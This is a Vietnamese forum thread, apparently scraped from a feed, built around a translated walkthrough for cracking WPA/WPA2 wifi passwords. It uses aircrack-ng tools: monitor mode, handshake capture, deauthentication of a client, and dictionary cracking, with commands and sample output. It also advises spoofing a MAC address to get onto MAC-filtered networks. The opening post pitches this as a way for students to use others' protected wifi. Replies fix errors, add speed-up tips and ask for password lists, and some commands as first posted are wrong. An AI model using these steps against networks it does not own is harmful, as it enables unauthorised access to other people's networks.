<![CDATA[Latest posts for the topic "hướng dẫn chi tiết tấn công một mạng wifi (wireless) "]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net hướng dẫn chi tiết tấn công một mạng wifi (wireless) Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bước 2 : run airodum-ng để collect authentical : airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 * -c 9 is chanel của network - -bssid 00:14:6C:7E:40:80 is the access point MAC address. -w psk file sẽ lưu IVs ath0 is the interface name. khi thành công bạn được như sau : CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116 WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file. bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha ) nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều : run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn : aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 khi thành công : 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] sau đó là đợi , càng lâu càng tốt nha cuối cùng run aircrack-ng để crack : aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap psk.cap là file capture ở trên password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt) khi thành công : Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s) KEY FOUND! [ 12345678 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB vậy là có thể crack thành công wpa rồi lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ crack nha VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó : bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac ]]> /hvaonline/posts/list/22387.html#133316 /hvaonline/posts/list/22387.html#133316 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh wrote:
...
tên của mạng wifi :teddy Access point channel: 9 Wireless interface: ath0  
bước 1 : chuyển wireless card qua chế độ monitor ifconfig eth0 up iwconfig eth0 mode monitor iwconfig lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" ...  
Hì, trên "ath0" dưới "eth0" rồi. Bạn nên định dạng bài viết cho đẹp hơn. Cái gì trích thì nên cho vào thẻ [ quote ], mã lệnh thì nên cho vào thẻ [ code ], đoạn nào cần lưu ý thì bôi đậm lên, ...]]>
/hvaonline/posts/list/22387.html#133363 /hvaonline/posts/list/22387.html#133363 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#133372 /hvaonline/posts/list/22387.html#133372 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) http://www.aircrack-ng.org/doku.php?id=cracking_wpa Tutorial: How to Crack WPA/WPA2 Version: 1.15.1 May 9, 2008 By: darkAudax
Introduction This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. he best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial. WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it. There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required. There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical. It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it. I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool. Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome. Assumptions First, this solution assumes: * You are using drivers patched for injection. Use the injection test to confirm your card can inject. * You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions. * You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed. Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change “ath0” to the interface name which is specific to your wireless card. Equipment used To follow this tutorial at home, you must have two wireless cards. In this tutorial, here is what was used: * MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82 * MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2 * BSSID (MAC address of access point): 00:14:6C:7E:40:80 * ESSID (Wireless network name): teddy * Access point channel: 9 * Wireless interface: ath0 You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network. ..........  

tranduyninh wrote:
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn crack wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn  
:( ]]>
/hvaonline/posts/list/22387.html#133402 /hvaonline/posts/list/22387.html#133402 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#133404 /hvaonline/posts/list/22387.html#133404 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#133632 /hvaonline/posts/list/22387.html#133632 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

nlfb wrote:
Hê hê, em gà món mạng lắm, nhưng sao cái MAC 2 bài giống nhau nhể? ;-), cái này bác copy ở đâu thế, vì công bác dịch thì chắc bác cũng sẽ bỏ thêm chút công đặt các đoạn lệnh vào tag mà. Lộ quá, lộ quá :D 
ha cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha . e rằng trong diễn đàn ít người thích copy từ tiếng anh sang tiếng việt lắm .]]>
/hvaonline/posts/list/22387.html#133732 /hvaonline/posts/list/22387.html#133732 GMT
hướng dẫn chi tiết tấn công một mạng wifi (wireless)

quanta wrote:

tranduyninh wrote:
...
tên của mạng wifi :teddy Access point channel: 9 Wireless interface: ath0  
bước 1 : chuyển wireless card qua chế độ monitor ifconfig eth0 up iwconfig eth0 mode monitor iwconfig lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" ...  
Hì, trên "ath0" dưới "eth0" rồi. Bạn nên định dạng bài viết cho đẹp hơn. Cái gì trích thì nên cho vào thẻ [ quote ], mã lệnh thì nên cho vào thẻ [ code ], đoạn nào cần lưu ý thì bôi đậm lên, ... 
cám ơn bro nhắc nhở]]>
/hvaonline/posts/list/22387.html#133733 /hvaonline/posts/list/22387.html#133733 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#133745 /hvaonline/posts/list/22387.html#133745 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#133822 /hvaonline/posts/list/22387.html#133822 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) -c 9 is chanel của network   Cái này có phải là translate hôn :-?
bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )  
Thử chưa? Đưa cảm nhận vào à :-)]]>
/hvaonline/posts/list/22387.html#133873 /hvaonline/posts/list/22387.html#133873 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh wrote:
... cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha .  
Đúng là cũng có công thật. Nhưng, tôi nghĩ như này sẽ hay hơn: Từ bài viết đó, bạn nên đọc để hiểu và thực hành trên một môi trường thật, sau đó ghi lại và giải thích các bước chính. Như thế ít ra bạn còn thu được kiến thức gì đó. Tôi hỏi bạn vài câu: 1. Đoạn này của bạn có chạy được không?

tranduyninh wrote:
bước 1: chuyển wireless card qua chế độ monitor Code:
ifconfig ath0 up
iwconfig ath0 mode monitor
 
(Đã nhắc sửa eth0 thành ath0 nhưng cũng không sửa) 2. Tại sao bạn không dùng airmon-ng để chuyển wireless card sang chế độ monitor: Code:
# airmon-ng start ath0
3.

tranduyninh wrote:
bước 2 : run airodum-ng để collect authentical : Code:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
* -c 9 is chanel của network - -bssid 00:14:6C:7E:40:80 is the access point MAC address. -w psk file sẽ lưu IVs ath0 is the interface name.  

tranduyninh wrote:
cuối cùng run aircrack-ng để crack : Code:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)  
"psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap? Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. Nếu không, tôi đành dời nó vào Trash. Cảm ơn.]]>
/hvaonline/posts/list/22387.html#134090 /hvaonline/posts/list/22387.html#134090 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

lamhoang20002000 wrote:
@ tranduyninh: Tui có xem một cái video của nước ngoài. Hình như hướng dẫn này pác dựa theo video đó hả. I xì đúc từ các command, đến cả password "123...8" nữa. Dù sao cũng cảm ơn pác.  
Bác có video hay link thì share lên đi, để anh em tò mò làm gì! :) PS: Mình nghĩ đây là chủ đề khá hay bác nào có thông tin "hay hay" post lên đây anh em học hỏi với nhé!]]>
/hvaonline/posts/list/22387.html#134095 /hvaonline/posts/list/22387.html#134095 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#134452 /hvaonline/posts/list/22387.html#134452 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#134455 /hvaonline/posts/list/22387.html#134455 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

vikjava wrote:
Hi mới tìm hiểu về wireless. Sẵn tiện cho mình hỏi luôn làm thế nào để biết mạng wifi đó dùng wep hay wpa để mã hóa dữ liệu truyền đi ? 
Code:
# iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: 00:40:96:57:B2:5A
                    ESSID:""
                    Mode:Master
                    Frequency:2.437 GHz (Channel 6)
                    Channel:6
                    Quality=33/100  Signal level=-89 dBm  Noise level=-87 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                    Extra:tsf=00000086ec9511d5
          Cell 02 - Address: 00:01:38:A8:2A:FD
                    ESSID:""
                    Mode:Master
                    Frequency:2.457 GHz (Channel 10)
                    Channel:10
                    Quality=81/100  Signal level=-53 dBm  Noise level=-90 dBm
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : TKIP CCMP
                        Authentication Suites (1) : PSK
                       Preauthentication Supported
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=000000196d72a8f8
          Cell 03 - Address: 00:18:39:EA:EE:AE
                    ESSID:""
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Channel:11
                    Quality=26/100  Signal level=-93 dBm  Noise level=-86 dBm
                    Encryption key:on
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (1) : TKIP
                        Authentication Suites (1) : PSK
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:tsf=00000006bcfb5183
          Cell 04 - Address: 00:1D:7E:47:1B:D1
                    ESSID:""
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Channel:11
                    Quality=37/100  Signal level=-87 dBm  Noise level=-86 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=00000050e7fb3181
Bạn để ý phần IE: Ngoài ra, bạn có thể dùng NetworkManager, chí vào "Cell" định kết nối, bạn sẽ biết:
]]>
/hvaonline/posts/list/22387.html#134457 /hvaonline/posts/list/22387.html#134457 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#134609 /hvaonline/posts/list/22387.html#134609 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh wrote:
cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra . 
Buồn gì, có người nhắc nhở chứng tỏ là có người quan tâm tới bạn.
Ây da, lâu lâu mới thấy 1 bài hay hay, để bữa nào nghịch thử xem sao 
Nghe câu này thấy không buồn chứ :D
Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. 
Bạn nên cảm thấy quý trọng những lời góp ý chân thành như thế này, nó sẽ giúp bạn tiến bộ hơn lên.]]>
/hvaonline/posts/list/22387.html#134611 /hvaonline/posts/list/22387.html#134611 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

eyesdog wrote:
Các tut ngon nhất của tây nhiều khi nói vậy nhưng không phải vậy, không thử, không hiểu, thực hiện máy móc theo tut mà được thì tôi chết liền !!!  
Tớ đồng ý với quan điểm này. Chẳng hạn, tớ dùng Fedora 9, cài aircrack-ng bằng yum. Thông tin wireless card như sau: Code:
# lsmod | grep 3945
iwl3945               145244  0 
mac80211              185184  1 iwl3945
cfg80211               24712  2 iwl3945,mac80211
Code:
# lspci | grep Wireless
06:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
Cài xong, hăm hở thử thực hiện. Ngay bước đầu tiên, chuyển wireless card sang chế độ "monitor" đã gặp ngay lỗi: Code:
# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0                   iwl3945 - [phy0]/usr/sbin/airmon-ng: line 338: /sys/class/ieee80211/phy0/add_iface: No such file or directory
mon0: unknown interface: No such device

                                (monitor mode enabled on mon0)
]]>
/hvaonline/posts/list/22387.html#134618 /hvaonline/posts/list/22387.html#134618 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#135693 /hvaonline/posts/list/22387.html#135693 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#135708 /hvaonline/posts/list/22387.html#135708 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#136991 /hvaonline/posts/list/22387.html#136991 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#137479 /hvaonline/posts/list/22387.html#137479 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

hanjyung wrote:
Cái này là crack WEP-key 64 bit chứ WPA nỗi gì. Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này. http://thegioimang.org/forum/showthread.php?t=394  
Cái "này" là cái nào? Bạn đọc http://www.aircrack-ng.org/doku.php?id=cracking_wpa chưa?]]>
/hvaonline/posts/list/22387.html#137483 /hvaonline/posts/list/22387.html#137483 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#137639 /hvaonline/posts/list/22387.html#137639 GMT Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#169685 /hvaonline/posts/list/22387.html#169685 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) @the shinichi: Mình chỉ dùng airolib complie cái file password lại thì aircrack nó sẽ nhanh hơn rất nhiều ( khoảng 60k words/s trở lên +pyrit). Còn cái file password đào đâu ra thì 1 là dùng MD5 harsh ra , 2 là down về cho gọn ( có cai rainbow table 33gb : 1mil words, 1k+ essid) Còn để file txt dò thì rất chậm khoảng 300 - 500 words/s .
Hanjyung có nói: Cái này là crack WEP-key 64 bit chứ WPA nỗi gì. Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này. http://thegioimang.org/forum/showthread.php?t=394  
bạn thật là TÀI... thấy 4-way hand shake + với lại opt password file kia ko... Còn về window crack wifi thì 1 câu thôi " Wang nó đi, phí thời gian" @tranduyminh: mình xin chỉnh lại cho bạn 1 tí Chạy airodump-ng xong thì phai deauth 1 client để lấy những cái packet đầu => 4way handshake. => ko có cái này ko inject hay làm j đc. Bạn dịch thiếu phần này sẽ gây hiểu lầm giữa crack WEP và crack WPA. @helllove: Tại vì opt -w có nghĩa write xuống theo định dạng là *.cap + 1 file .txt. Nếu bạn ko tin thì bạn có thể vào trong thư mục root/user hoặc thư mục nào bạn -w xuống. Cho nên ở lệnh aircrack-ng thì phải để psk.cap vì nó sẽ báo no diectory found nếu để psk không.]]>
/hvaonline/posts/list/22387.html#184740 /hvaonline/posts/list/22387.html#184740 GMT
Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh wrote:
cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra . 
Nếu bạn sử dụng Ubuntu thì có lẽ sẽ dễ dàng thực hiện hơn. Với wireless card Broadcom BCM43xx bạn có thể tìm driver b43-fwcutter. Mình tìm được một link hướng dẫn thêm patch cho kernel và biên dịch kernel cho Ubuntu 9.10 ở đây http://hacking-library.com/forum/viewtopic.php?f=36&t=201&start=0, bạn có thể làm theo hướng dẫn.]]>
/hvaonline/posts/list/22387.html#198209 /hvaonline/posts/list/22387.html#198209 GMT
hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#198316 /hvaonline/posts/list/22387.html#198316 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#199447 /hvaonline/posts/list/22387.html#199447 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#200486 /hvaonline/posts/list/22387.html#200486 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#200504 /hvaonline/posts/list/22387.html#200504 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#203719 /hvaonline/posts/list/22387.html#203719 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#204425 /hvaonline/posts/list/22387.html#204425 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) http://www.offensive-security.com/videos/bt3teaser/bt3teaser.html]]> /hvaonline/posts/list/22387.html#204426 /hvaonline/posts/list/22387.html#204426 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) 2 cái clip made by myself đây (làm trong điều kiện lý tưởng) WPA Code:
http://www.youtube.com/watch?v=hqL2efcUoVc
WEP Code:
http://www.youtube.com/watch?v=fIV8yh5AqrM
]]>
/hvaonline/posts/list/22387.html#205777 /hvaonline/posts/list/22387.html#205777 GMT
hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/22387.html#205878 /hvaonline/posts/list/22387.html#205878 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless) /hvaonline/posts/list/33419.html không? === Ở đây bán khiên với giáo cùng với nhau. ===]]> /hvaonline/posts/list/22387.html#205891 /hvaonline/posts/list/22387.html#205891 GMT hướng dẫn chi tiết tấn công một mạng wifi (wireless)

myquartz wrote:
Hehe! Bài viết trên có thể crack được cái này: /hvaonline/posts/list/33419.html không? === Ở đây bán khiên với giáo cùng với nhau. === 
Bó tay :). Captive portal nó còn không qua được nữa thì đừng nói tới cert.]]>
/hvaonline/posts/list/22387.html#205936 /hvaonline/posts/list/22387.html#205936 GMT
hướng dẫn chi tiết tấn công một mạng wifi (wireless) đối với WPA : quan trọng là bắt được cái 4-way handshake thì việc bẻ khóa mới thực hiện được. Cũng dùng aireplay-ng -0 đá nó ra , nó yêu cầu kết nối , ngay lúc đó cái sẽ chụp được cái 4-way handshake. Rồi dùng aircrack + từ điển thịt nó (hình như thằng aircrack này nó chỉ có thể dò từ khóa trong file từ điển chứ nó ko bít tổ hợp hay là bruteforce , nghĩa là trong từ điển phải có chính xác từ khóa trùng với password thì mới có kết quả)  Bác nói đúng, em đã thử dùng BT3 crack theo cái guide của aircrack.org nhưng chỉ mới crack được 1 con WPA2 với pass là 123456789 thui, còn pass khó hơn thì cái password.lst của nó không có chứa. Nhân tiện các bác có biết cách nào để tạo cái password list theo ý mình hay bác nào có bộ từ điển xịn share cho em với. Nó hướng dẫn sử dụng cái John the ripper để tạo nhưng vào trang của nó toàn nói về unix với linux, mấy cái đó em không rành lắm :D]]> /hvaonline/posts/list/22387.html#207124 /hvaonline/posts/list/22387.html#207124 GMT